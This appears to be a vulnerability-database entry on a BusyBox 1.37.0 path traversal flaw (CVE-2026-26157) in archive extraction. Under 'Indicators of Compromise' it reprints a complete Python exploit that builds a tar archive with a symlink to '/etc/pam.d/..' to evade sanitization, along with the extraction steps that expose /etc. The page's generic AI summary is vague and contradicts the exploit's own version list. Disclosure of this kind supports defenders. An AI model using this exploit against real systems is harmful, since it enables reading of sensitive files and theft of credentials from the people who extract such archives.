BusyBox 1.37.0 - Path Traversal
This is a path traversal vulnerability affecting BusyBox version 1. 37. 0. The vulnerability allows an attacker to manipulate file paths to access files outside the intended directory. Exploit code is publicly available in Python. No patch or official remediation information is provided.
AI Analysis
Technical Summary
BusyBox 1.37.0 contains a path traversal vulnerability that can be exploited to access unauthorized files by manipulating file paths. The exploit is documented and includes Python code demonstrating the attack. No specific affected versions beyond 1.37.0 are detailed, and no vendor advisory or patch information is available.
Potential Impact
Successful exploitation could allow an attacker to read or possibly write files outside the intended directory scope, potentially exposing sensitive information or altering system files. The exact impact depends on the BusyBox usage context and permissions.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until a patch is available, restrict access to BusyBox utilities and monitor for suspicious activity related to path traversal attempts.
Indicators of Compromise
- exploit-code: # Exploit Title: BusyBox 1.37.0 - Path Traversal # Google Dork: N/A # Date: 2026-02-11 # Exploit Author: Calil Khalil # Vendor Homepage: https://busybox.net # Software Link: https://busybox.net/downloads/ # Version: BusyBox 1.36.1, 1.37.0 # Tested on: Ubuntu 22.04 LTS, Alpine Linux 3.19 # CVE: CVE-2026-26157 """ BusyBox Path Traversal Vulnerability (CVE-2026-26157) Description: BusyBox archive extraction utilities fail to properly sanitize symlink targets containing trailing ".." components. The strip_unsafe_prefix() function in archival/libarchive/unsafe_prefix.c uses strstr(cp, "/../") which only matches the 4-character pattern and misses 3-character trailing "/.." sequences. This allows an attacker to craft malicious archives with symlinks pointing to arbitrary filesystem locations, enabling information disclosure through symlink traversal. Affected Components: - tar (primary vector) - unzip - rpm - ar Impact: - CVSS Score: 7.8 (HIGH) - Arbitrary file read via symlink traversal - Information disclosure - Credential theft Root Cause: archival/libarchive/unsafe_prefix.c:23 The pattern matching in strip_unsafe_prefix() fails on trailing ".." paths: cp2 = strstr(cp, "/../"); // Only matches "/../", misses "/pam.d/.." if (!cp2) break; Attack Scenario: 1. Attacker creates TAR archive with symlink: sensitive_data -> /etc/pam.d/.. 2. Victim extracts archive using BusyBox tar 3. Symlink created without sanitization 4. Symlink resolves to /etc directory 5. Application reading 'sensitive_data' exposes /etc contents References: - https://github.com/calilkhalil/research - Red Hat CNA Case: INC3907198 """ import tarfile import sys import os def create_exploit(): """ Creates a malicious TAR file exploiting CVE-2026-26157. The archive contains a symlink with an unsanitized target that resolves outside the extraction directory. """ exploit_file = 'CVE-2026-26157_exploit.tar' try: with tarfile.open(exploit_file, 'w') as tar: # Create symlink with trailing ".." in target path # This bypasses strip_unsafe_prefix() pattern matching info = tarfile.TarInfo('sensitive_data') info.type = tarfile.SYMTYPE info.linkname = '/etc/pam.d/..' # Resolves to /etc tar.addfile(info) print(f"[+] Exploit created: {exploit_file}") print(f"\n[*] Exploitation steps:") print(f" 1. mkdir test_extraction && cd test_extraction") print(f" 2. busybox tar xf ../{exploit_file}") print(f" 3. readlink -f sensitive_data") print(f" Expected output: /etc") print(f" 4. ls sensitive_data/") print(f" Result: Lists /etc directory contents") print(f"\n[!] Impact: Arbitrary directory read via symlink traversal") print(f"[!] CVSS: 7.8 HIGH (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)") return exploit_file except Exception as e: print(f"[-] Error creating exploit: {e}") sys.exit(1) def show_technical_details(): """Display technical analysis of the vulnerability""" print("\n" + "="*70) print("TECHNICAL ANALYSIS - CVE-2026-26157") print("="*70) print("\nVulnerable Function:") print(" archival/libarchive/unsafe_prefix.c:strip_unsafe_prefix()") print("\nVulnerable Code Pattern:") print(" cp2 = strstr(cp, \"/../\"); // Only matches 4-char sequence") print(" if (!cp2) break;") print("\nBypass Technique:") print(" Path: /etc/pam.d/..") print(" Pattern check: strstr(\"/etc/pam.d/..\", \"/../\") -> NULL") print(" Result: Sanitization bypassed, symlink created with original target") print("\nExploitation Flow:") print(" 1. Archive contains: symlink 'sensitive_data' -> '/etc/pam.d/..'") print(" 2. get_header_tar() extracts symlink metadata") print(" 3. Symlink target NOT sanitized (bypass detected)") print(" 4. data_extract_all() creates symlink with '/etc/pam.d/..'") print(" 5. Target resolves: /etc/pam.d/.. -> /etc") print(" 6. Reading 'sensitive_data' = reading /etc") print("="*70 + "\n") if __name__ == "__main__": print("="*70) print("BusyBox Path Traversal Exploit - CVE-2026-26157") print("Author: Calil Khalil") print("="*70) # Display technical analysis show_technical_details() # Create exploit exploit_file = create_exploit() print("\n[*] Mitigation:") print(" - Update BusyBox to patched version") print(" - Patch applies strip_unsafe_prefix() to symlink targets") print(" - Do not extract untrusted archives with elevated privileges") print("\n[*] For educational and authorized testing purposes only")
BusyBox 1.37.0 - Path Traversal
Description
This is a path traversal vulnerability affecting BusyBox version 1. 37. 0. The vulnerability allows an attacker to manipulate file paths to access files outside the intended directory. Exploit code is publicly available in Python. No patch or official remediation information is provided.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
BusyBox 1.37.0 contains a path traversal vulnerability that can be exploited to access unauthorized files by manipulating file paths. The exploit is documented and includes Python code demonstrating the attack. No specific affected versions beyond 1.37.0 are detailed, and no vendor advisory or patch information is available.
Potential Impact
Successful exploitation could allow an attacker to read or possibly write files outside the intended directory scope, potentially exposing sensitive information or altering system files. The exact impact depends on the BusyBox usage context and permissions.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until a patch is available, restrict access to BusyBox utilities and monitor for suspicious activity related to path traversal attempts.
Technical Details
- Edb Id
- 52538
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for BusyBox 1.37.0 - Path Traversal
# Exploit Title: BusyBox 1.37.0 - Path Traversal # Google Dork: N/A # Date: 2026-02-11 # Exploit Author: Calil Khalil # Vendor Homepage: https://busybox.net # Software Link: https://busybox.net/downloads/ # Version: BusyBox 1.36.1, 1.37.0 # Tested on: Ubuntu 22.04 LTS, Alpine Linux 3.19 # CVE: CVE-2026-26157 """ BusyBox Path Traversal Vulnerability (CVE-2026-26157) Description: BusyBox archive extraction utilities fail to properly sanitize symlink targets containing trailing ".." components.... (4274 more characters)
Threat ID: 69f5140dcbff5d86105a4033
Added to database: 5/1/2026, 8:58:53 PM
Last enriched: 5/1/2026, 8:59:23 PM
Last updated: 5/2/2026, 5:49:14 AM
Views: 8
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.